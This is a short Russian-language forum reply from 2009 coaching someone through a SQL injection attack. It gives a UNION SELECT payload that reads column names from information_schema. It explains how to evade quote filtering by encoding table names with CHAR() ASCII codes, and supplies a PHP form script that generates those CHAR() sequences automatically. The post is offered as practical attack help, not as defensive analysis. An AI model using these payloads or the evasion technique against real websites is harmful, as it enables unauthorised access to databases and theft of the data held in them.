27.12.2009, 19:54
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 10
С нами:
8619984
Репутация:
30
|
|
Union+select+column_name+from+information_schema.c olumns+where+table_name='table'
скорее всего фильтруются кавычки, и на этот случай, специально для нас  разработчики придумали функцию CHAR(), которой необходимо передать ASCII код символа, или несколько ASCII кодов через запятую.
Допустим, запрос SELECT CHAR(117,115,101,114,115) вернет тебе users, кавычки при этом туда вбивать не надо.
PS. А вот тебе скриптик, чтобы автоматом генерить эту комбинацию.
PHP код:
<form action='' method='POST'>
<input type='text' name='ascii' />
<input type='submit' name='gogo' />
</form>
<hr/>
<?php
if($_POST['gogo'] && $_POST['ascii'] != ''){
for($i = 0; $i < strlen($_POST['ascii']); $i++){
$arr[] = substr($_POST['ascii'], $i, 1);
}
$str = 'char(';
foreach($arr as $k=>$v) {
if($k == count($arr) - 1){ $str .= ord($v).')'; break; }
$str .= ord($v).',';
}
echo $str;
}
?>
|
|
|